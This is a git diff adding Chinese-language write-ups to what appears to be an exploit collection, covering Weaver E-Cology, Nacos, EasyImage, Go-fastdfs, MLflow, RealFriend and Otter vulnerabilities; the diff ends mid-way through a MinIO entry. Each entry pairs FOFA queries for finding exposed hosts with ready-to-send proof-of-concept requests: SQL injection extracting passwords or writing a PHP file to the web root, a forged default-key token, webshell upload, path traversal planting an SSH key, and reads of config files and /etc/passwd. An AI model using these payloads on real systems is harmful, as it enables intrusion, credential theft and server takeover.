diff --git a/OA产品漏洞/images/image-20230417093344265.png b/OA产品漏洞/images/image-20230417093344265.png new file mode 100644 index 0000000..e488df3 Binary files /dev/null and b/OA产品漏洞/images/image-20230417093344265.png differ diff --git a/OA产品漏洞/images/image-20230417093412026.png b/OA产品漏洞/images/image-20230417093412026.png new file mode 100644 index 0000000..575b40b Binary files /dev/null and b/OA产品漏洞/images/image-20230417093412026.png differ diff --git a/OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md b/OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md new file mode 100644 index 0000000..9501d5a --- /dev/null +++ b/OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md @@ -0,0 +1,32 @@ +# 泛微OA v9 E-Cology browser.jsp SQL注入漏洞 + +## 漏洞描述 + +泛微OA E-Cology browser.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息,进一步进行攻击 + +## 漏洞影响 + +``` +泛微 E-Cology v9 +``` + +## FOFA + +``` +product="泛微-协同商务系统" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093344265](images/image-20230417093344265.png) + +验证POC, 将SQL语句进行3次URL编码 + +``` +asdasdasxx%' union select 1,(select password from HrmResourceManager where id=1) union select 1,'1 +/mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31 +``` + +![image-20230417093412026](images/image-20230417093412026.png) \ No newline at end of file diff --git a/README.md b/README.md index 0a5a220..fb06aed 100644 --- a/README.md +++ b/README.md @@ -121,6 +121,7 @@ * 泛微OA ln.FileDownload 任意文件读取漏洞 * 泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞 * 泛微OA uploadOperation.jsp 任意文件上传 + * 泛微OA v9 E-Cology browser.jsp SQL注入漏洞 * 泛微OA weaver.common.Ctrl 任意文件上传漏洞 * 泛微OA WorkflowCenterTreeData SQL注入漏洞 * 用友 ERP-NC NCFindWeb 目录遍历漏洞 @@ -191,7 +192,9 @@ * Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293 * Alibaba AnyProxy fetchBody 任意文件读取漏洞 * Alibaba Canal config 云密钥信息泄露漏洞 + * Alibaba Nacos secret.key默认密钥 未授权访问漏洞 * Alibaba Nacos 未授权访问漏洞 + * Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 * Appspace jsonprequest SSRF漏洞 CVE-2021-27670 * Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804 * Atlassian Bitbucket 登录绕过漏洞 @@ -219,6 +222,8 @@ * Dogtag PKI XML实体注入漏洞 CVE-2022-2414 * Dolibarr edit.php 远程命令执行漏洞 CVE-2022-40871 * E-message 越权访问漏洞 + * EasyImage down.php 任意文件读取漏洞 + * EasyImage manager.php 后台任意文件上传漏洞 * eGroupWare spellchecker.php 远程命令执行漏洞 * Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞 * Evolucare Ecsimaging new_movie.php 远程命令执行漏洞 @@ -233,6 +238,8 @@ * GitLab SSRF漏洞 CVE-2021-22214 * GitLab 任意文件读取导致RCE CVE-2020-10977 * GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914 + * Go-fastdfs GetClientIp 未授权访问漏洞 + * Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800 * Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499 * Grafana plugins 任意文件读取漏洞 CVE-2021-43798 * H3C IMC dynamiccontent.properties.xhtm 远程命令执行 @@ -259,6 +266,7 @@ * MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543 * Metabase geojson 任意文件读取漏洞 CVE-2021-41277 * MKdocs 任意文件读取漏洞 CVE-2021-40978 + * MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177 * Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444 * Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204 * Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238 @@ -350,6 +358,7 @@ * 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞 * 深信服 日志中心 c.php 远程命令执行漏洞 * 深信服 行为感知系统 c.php 远程命令执行漏洞 + * 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞 * 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 * 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞 * 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞 @@ -376,7 +385,6 @@ * 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437 * 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞 * 阿尔法科技 虚拟仿真实验室 未授权访问漏洞 - * 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 * 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113 * 章管家 Druid未授权访问漏洞 * 飞视美 视频会议系统 Struts2 远程命令执行漏洞 @@ -509,6 +517,7 @@ * Microsoft Exchange 信息泄露漏洞 CVE-2020-17143 * Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858 * MinIO SSRF漏洞 CVE-2021-21287 + * MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432 * MySQL UDF提权 * NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056 * OpenSSH 命令注入漏洞 CVE-2020-15778 @@ -654,6 +663,7 @@ * 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371 * 悦泰节能 智能数据网关 resources 任意文件读取漏洞 * 惠尔顿 e地通 config.xml 信息泄漏漏洞 + * 才茂通信 网关 formping 远程命令执行漏洞 * 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328 * 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞 * 烽火 HG6245D info.asp 信息泄露漏洞 diff --git a/Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md b/Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md new file mode 100644 index 0000000..4893965 --- /dev/null +++ b/Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md @@ -0,0 +1,35 @@ +# Alibaba Nacos secret.key默认密钥 未授权访问漏洞 + +## 漏洞描述 + +Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞 + +## 漏洞影响 + +``` +Alibaba Nacos <= 2.2.0 +``` + +## FOFA + +``` +app="NACOS" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093555107](images/image-20230417093555107.png) + +漏洞原因是使用了固定的Key + +![image-20230417093624167](images/image-20230417093624167.png) + +验证POC + +``` +/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9 +``` + +![image-20230417093649928](images/image-20230417093649928.png) \ No newline at end of file diff --git a/Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md b/Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md new file mode 100644 index 0000000..ef77077 --- /dev/null +++ b/Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md @@ -0,0 +1,22 @@ +# Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 + +## 漏洞描述 + +Alibaba otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。 + +参考链接: + +* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592 +* https://forum.ywhack.com/thread-115309-1-8.html + +## FOFA + +``` +title="Otter Manager" +``` + +## 漏洞复现 + +默认口令:`admin/admin` + +进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。 \ No newline at end of file diff --git a/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md b/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md new file mode 100644 index 0000000..546f437 --- /dev/null +++ b/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# EasyImage down.php 任意文件读取漏洞 + +## 漏洞描述 + +EasyImage down.php 文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件 + +## 漏洞影响 + +``` +EasyImage +``` + +## FOFA + +``` +app="EasyImage-简单图床" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094057151](images/image-20230417094057151.png) + +验证POC + +``` +/application/down.php?dw=./config/config.php +``` + +![image-20230417094115549](images/image-20230417094115549.png) \ No newline at end of file diff --git a/Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md b/Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md new file mode 100644 index 0000000..f301f3b --- /dev/null +++ b/Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md @@ -0,0 +1,86 @@ +# EasyImage manager.php 后台任意文件上传漏洞 + +## 漏洞描述 + +EasyImage manager.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件到服务器获取服务器权限 + +## 漏洞影响 + +``` +EasyImage +``` + +## FOFA + +``` +app="EasyImage-简单图床" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094210473](images/image-20230417094210473.png) + +登陆后台后发送POC (通过任意文件读取获取账号密码) + +``` +POST /admin/manager.php?p= HTTP/1.1 +Host: +Accept: application/json +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Cache-Control: no-cache +Content-Length: 1622 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUCF9Yq83AkaO6sv +Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680341989; auth=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22tossone%22%3Bi%3A1%3Bs%3A32%3A%22590368bca375c2f8fe93df7d253481e8%22%3B%7D; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1680342144; filemanager=sdeemhj3b9aeoretftrlijjh25 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 + +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzuuid" + +7e4fad9a-3545-4ed6-b655-b3e3a6b2978c +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzchunkindex" + +0 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dztotalfilesize" + +583 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzchunksize" + +10000000 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dztotalchunkcount" + +1 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzchunkbyteoffset" + +0 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="p" + + +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="fullpath" + +shell.php +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="file"; filename="shell.php" +Content-Type: application/octet-stream + +234 + +------WebKitFormBoundaryEUCF9Yq83AkaO6sv-- +``` + +![image-20230417094255974](images/image-20230417094255974.png) + +上传访问地址为 + +``` +/i/shell.php +``` \ No newline at end of file diff --git a/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md b/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md new file mode 100644 index 0000000..641729e --- /dev/null +++ b/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md @@ -0,0 +1,65 @@ +# Go-fastdfs GetClientIp 未授权访问漏洞 + +## 漏洞描述 + +Go-fastdfs GetClientIp方法存在XFF头绕过漏洞,攻击者通过漏洞可以未授权调用接口,获取配置文件等敏感信息 + +## 漏洞影响 + +``` +Go-fastdfs +``` + +## FOFA + +``` +"go-fastdfs" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094508409](images/image-20230417094508409.png) + +调用读取配置接口,返回 ip 不允许访问 + +``` +/group1/reload?action=get +``` + +![image-20230417094521737](images/image-20230417094521737.png) + +追踪错误信息代码 + +![image-20230417094533985](images/image-20230417094533985.png) + +![image-20230417094542486](images/image-20230417094542486.png) + +跟一下 GetClientIp方法,这里会从 X-Forwarded-For 等参数获取值 + +![image-20230417094554500](images/image-20230417094554500.png) + +回到调用的起点,验证方法为调用 IsPeer 参数 + +![image-20230417094604965](images/image-20230417094604965.png) + +![image-20230417094613037](images/image-20230417094613037.png) + +这里主要是验证获取到的值是否为配置中的 AdminIps + +![image-20230417094623353](images/image-20230417094623353.png) + +在配置文件 cfg.json 中 admin_ips 默认为 127.0.0.1 (可被爆破) + +![image-20230417100058531](images/image-20230417100058531.png) + +所以通过设置 X-Forwarded-For 就可以绕过接口调用限制,执行修改配置文件等操作,验证POC + +``` +/group1/reload?action=get + +X-Forwarded-For: 127.0.0.1 +``` + +![image-20230417100112324](images/image-20230417100112324.png) \ No newline at end of file diff --git a/Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md b/Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md new file mode 100644 index 0000000..ede1c37 --- /dev/null +++ b/Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md @@ -0,0 +1,78 @@ +# Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800 + +## 漏洞描述 + +Go-fastdfs upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,攻击服务器 + +## 漏洞影响 + +``` +Go-fastdfs +``` + +## FOFA + +``` +"go-fastdfs" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094508409](images/image-20230417094508409.png) + +验证POC + +``` +POST /group1/upload HTTP/1.1 +Host: +Content-Length: 951 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="file"; filename="id" +Content-Type: application/octet-stream + +test +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="scene" + +default +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="filename" + +id_rsa +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="output" + +json2 +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="path" + +../../../../../root/.ssh +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="code" + + +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="auth_token" + + +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="submit" + +upload +------WebKitFormBoundaryigj9M9EJykZc9u53-- +``` + +![image-20230417100221820](images/image-20230417100221820.png) + +![image-20230417100230696](images/image-20230417100230696.png) \ No newline at end of file diff --git a/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md b/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md new file mode 100644 index 0000000..e8e6744 --- /dev/null +++ b/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md @@ -0,0 +1,51 @@ +# MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177 + +## 漏洞描述 + +使用 MLflow 模型注册表托管 MLflow 开源项目的用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器(例如,通过使用云 VPC、入站请求的 IP 白名单或身份验证 /授权中间件)。 + +此问题仅影响运行 mlflow server和 mlflow ui命令。 不使用的集成 mlflow server或者 mlflow ui不受影响; 例如,Azure Machine Learning 上的 Databricks Managed MLflow 产品和 MLflow 不使用这些命令,并且不会以任何方式受到这些漏洞的影响。 + +## 漏洞影响 + +``` +MLflow < 2.2.1 +``` + +## FOFA + +``` +app.name="MLflow" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093814404](images/image-20230417093814404.png) + +验证POC + +``` +POST /ajax-api/2.0/mlflow/registered-models/create +Content-Type: application/json + +{"name": "testfile"} +``` + +![image-20230417093836998](images/image-20230417093836998.png) + +``` +POST /ajax-api/2.0/mlflow/model-versions/create +Content-Type: application/json + +{"name": "testfile", "source": "/etc"} +``` + +![image-20230417093851779](images/image-20230417093851779.png) + +``` +/model-versions/get-artifact?path=passwd&name=testfile&version=1 +``` + +![image-20230417093907298](images/image-20230417093907298.png) \ No newline at end of file diff --git a/Web应用漏洞/images/image-20230417093555107.png b/Web应用漏洞/images/image-20230417093555107.png new file mode 100644 index 0000000..3a9d9f9 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093555107.png differ diff --git a/Web应用漏洞/images/image-20230417093624167.png b/Web应用漏洞/images/image-20230417093624167.png new file mode 100644 index 0000000..179971e Binary files /dev/null and b/Web应用漏洞/images/image-20230417093624167.png differ diff --git a/Web应用漏洞/images/image-20230417093649928.png b/Web应用漏洞/images/image-20230417093649928.png new file mode 100644 index 0000000..d204d32 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093649928.png differ diff --git a/Web应用漏洞/images/image-20230417093814404.png b/Web应用漏洞/images/image-20230417093814404.png new file mode 100644 index 0000000..608c8ca Binary files /dev/null and b/Web应用漏洞/images/image-20230417093814404.png differ diff --git a/Web应用漏洞/images/image-20230417093836998.png b/Web应用漏洞/images/image-20230417093836998.png new file mode 100644 index 0000000..037ad3b Binary files /dev/null and b/Web应用漏洞/images/image-20230417093836998.png differ diff --git a/Web应用漏洞/images/image-20230417093851779.png b/Web应用漏洞/images/image-20230417093851779.png new file mode 100644 index 0000000..e6d9502 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093851779.png differ diff --git a/Web应用漏洞/images/image-20230417093907298.png b/Web应用漏洞/images/image-20230417093907298.png new file mode 100644 index 0000000..722df64 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093907298.png differ diff --git a/Web应用漏洞/images/image-20230417094057151.png b/Web应用漏洞/images/image-20230417094057151.png new file mode 100644 index 0000000..5b803c5 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094057151.png differ diff --git a/Web应用漏洞/images/image-20230417094115549.png b/Web应用漏洞/images/image-20230417094115549.png new file mode 100644 index 0000000..e9c2b41 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094115549.png differ diff --git a/Web应用漏洞/images/image-20230417094210473.png b/Web应用漏洞/images/image-20230417094210473.png new file mode 100644 index 0000000..d0df2ff Binary files /dev/null and b/Web应用漏洞/images/image-20230417094210473.png differ diff --git a/Web应用漏洞/images/image-20230417094255974.png b/Web应用漏洞/images/image-20230417094255974.png new file mode 100644 index 0000000..1dc1115 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094255974.png differ diff --git a/Web应用漏洞/images/image-20230417094508409.png b/Web应用漏洞/images/image-20230417094508409.png new file mode 100644 index 0000000..bb07780 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094508409.png differ diff --git a/Web应用漏洞/images/image-20230417094521737.png b/Web应用漏洞/images/image-20230417094521737.png new file mode 100644 index 0000000..3921eb9 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094521737.png differ diff --git a/Web应用漏洞/images/image-20230417094533985.png b/Web应用漏洞/images/image-20230417094533985.png new file mode 100644 index 0000000..06953fd Binary files /dev/null and b/Web应用漏洞/images/image-20230417094533985.png differ diff --git a/Web应用漏洞/images/image-20230417094542486.png b/Web应用漏洞/images/image-20230417094542486.png new file mode 100644 index 0000000..a67f629 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094542486.png differ diff --git a/Web应用漏洞/images/image-20230417094554500.png b/Web应用漏洞/images/image-20230417094554500.png new file mode 100644 index 0000000..cf2e40b Binary files /dev/null and b/Web应用漏洞/images/image-20230417094554500.png differ diff --git a/Web应用漏洞/images/image-20230417094604965.png b/Web应用漏洞/images/image-20230417094604965.png new file mode 100644 index 0000000..c4dd6a4 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094604965.png differ diff --git a/Web应用漏洞/images/image-20230417094613037.png b/Web应用漏洞/images/image-20230417094613037.png new file mode 100644 index 0000000..6f88efa Binary files /dev/null and b/Web应用漏洞/images/image-20230417094613037.png differ diff --git a/Web应用漏洞/images/image-20230417094623353.png b/Web应用漏洞/images/image-20230417094623353.png new file mode 100644 index 0000000..c3a4c8a Binary files /dev/null and b/Web应用漏洞/images/image-20230417094623353.png differ diff --git a/Web应用漏洞/images/image-20230417100058531.png b/Web应用漏洞/images/image-20230417100058531.png new file mode 100644 index 0000000..062a95a Binary files /dev/null and b/Web应用漏洞/images/image-20230417100058531.png differ diff --git a/Web应用漏洞/images/image-20230417100112324.png b/Web应用漏洞/images/image-20230417100112324.png new file mode 100644 index 0000000..b9efe82 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100112324.png differ diff --git a/Web应用漏洞/images/image-20230417100221820.png b/Web应用漏洞/images/image-20230417100221820.png new file mode 100644 index 0000000..b8213d5 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100221820.png differ diff --git a/Web应用漏洞/images/image-20230417100230696.png b/Web应用漏洞/images/image-20230417100230696.png new file mode 100644 index 0000000..a5bb060 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100230696.png differ diff --git a/Web应用漏洞/images/image-20230417100516425.png b/Web应用漏洞/images/image-20230417100516425.png new file mode 100644 index 0000000..054878a Binary files /dev/null and b/Web应用漏洞/images/image-20230417100516425.png differ diff --git a/Web应用漏洞/images/image-20230417100529493.png b/Web应用漏洞/images/image-20230417100529493.png new file mode 100644 index 0000000..ccc8672 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100529493.png differ diff --git a/Web应用漏洞/images/image-20230417100544162.png b/Web应用漏洞/images/image-20230417100544162.png new file mode 100644 index 0000000..ad1f320 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100544162.png differ diff --git a/Web应用漏洞/images/image-20230417100554583.png b/Web应用漏洞/images/image-20230417100554583.png new file mode 100644 index 0000000..c4a4a0d Binary files /dev/null and b/Web应用漏洞/images/image-20230417100554583.png differ diff --git a/Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md b/Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md new file mode 100644 index 0000000..c974121 --- /dev/null +++ b/Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md @@ -0,0 +1,41 @@ +# 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞 + +## 漏洞描述 + +瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞,由于参数传入没有进行过滤导致存在SQL注入,攻击者通过漏洞可以获取数据库敏感信息 + +## 漏洞影响 + +``` +瑞友应用虚拟化系统 7.0.2.1 +``` + +## FOFA + +``` +"CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417100516425](images/image-20230417100516425.png) + +在 GetBSAppUrl 方法中存在SQL注入漏洞,通过漏洞可以写入Webshell文件 + +![image-20230417100529493](images/image-20230417100529493.png) + +验证POC + +``` +/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123 +``` + +![image-20230417100544162](images/image-20230417100544162.png) + +``` +/test7.php +``` + +![image-20230417100554583](images/image-20230417100554583.png) \ No newline at end of file diff --git a/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md b/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md deleted file mode 100644 index e0033f6..0000000 --- a/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md +++ /dev/null @@ -1,22 +0,0 @@ -# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 - -## 漏洞描述 - -阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。 - -参考链接: - -* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592 -* https://forum.ywhack.com/thread-115309-1-8.html - -## FOFA - -``` -title="Otter Manager" -``` - -## 漏洞复现 - -默认口令:`admin/admin` - -进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。 \ No newline at end of file diff --git a/服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md b/服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md new file mode 100644 index 0000000..7062c1f --- /dev/null +++ b/服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md @@ -0,0 +1,31 @@ +# MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432 + +## 漏洞描述 + +Minio 